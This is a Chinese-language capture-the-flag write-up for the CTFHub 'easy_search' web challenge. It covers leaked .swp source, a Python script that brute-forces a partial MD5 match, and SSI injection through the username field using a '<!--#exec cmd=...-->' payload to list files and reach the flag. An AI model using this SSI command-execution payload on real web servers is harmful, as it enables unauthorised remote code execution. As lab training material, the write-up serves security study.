CTFHub_2020-BDJCTF-Web-easy_search(.swp备份文件源码泄露、SSI注入)
进入场景,显示如下
简单测试一下,没有sql注入
根据题目easy search提示,扫描一下,发现index.php.swp文件(注意及时更新扫描字典)
.swp备份文件源码泄露
<?php ob_start(); function get_hash(){ $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-'; $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times $content = uniqid().$random; return sha1($content); } header("Content-Type: text/html;charset=utf-8"); *** if(isset($_POST['username']) and $_POST['username'] != '' ) { $admin = '6d0bc1'; if ( $admin == substr(md5($_POST['password']),0,6)) { echo "<script>alert('[+] Welcome to manage system')</script>"; $file_shtml = "public/".get_hash().".shtml"; $shtml = fopen($file_shtml, "w") or die("Unable to open file!"); $text = ' *** *** <h1>Hello,'.$_POST['username'].'</h1> *** ***'; fwrite($shtml,$text); fclose($shtml); *** echo "[!] Header error ..."; } else { echo "<script>alert('[!] Failed')</script>"; }else { *** } *** ?>
审计一下,逻辑是首先随机获取文件名的一个函数,让password前6个字符的md5加密值等于6d0bc1,然后会在public目录下创建一个shtml文件,再将post传参的username字段写入这个shtml文件中。
前6个字符的md5值等于6d0bc1的脚本如下,跑出结果是2020666。
import hashlib def md5(s): return hashlib.md5(s.encode('utf-8')).hexdigest() for i in range(1, 10000000): if md5(str(i)).startswith('6d0bc1'): print(i) break
测试一下网站基本功能,用户名aaa,密码2020666登录进去,在响应头处获得文件路径(抓包也可以看到)
访问查看结果
利用SSI注入漏洞,我们可以在username变量中传入ssi语句来远程执行系统命令。
<!--#exec cmd="命令"-->
shtml是一种基于SSI技术的文件。SSI 注入全称Server-Side Includes Injection,即服务端包含注入。SSI 是类似于 CGI,用于动态页面的指令。SSI 注入允许远程在 Web 应用中注入脚本来执行代码。SSI是嵌入HTML页面中的指令,在页面被提供时由服务器进行运算,以对现有HTML页面增加动态生成的内容,而无须通过CGI程序提供其整个页面,或者使用其他动态技术。从技术角度上来说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针,即允许通过在HTML页面注入脚本或远程执行任意代码。IIS和Apache都可以开启SSI功能。
SSI注入的条件:
- 1.Web 服务器已支持SSI(服务器端包含)
- 2.Web 应用程序未对对相关SSI关键字做过滤
- 3.Web 应用程序在返回响应的HTML页面时,嵌入用户输入)
用户名输入payload:<!--#exec cmd="ls ../"--> ,密码输入2020666登录,获取响应头处的url
访问url,得到flag文件名
访问flag_990c66bf85a09c664f0b6741840499b2文件后得到flag
参考:https://www.cnblogs.com/wkzb/p/12391211.html
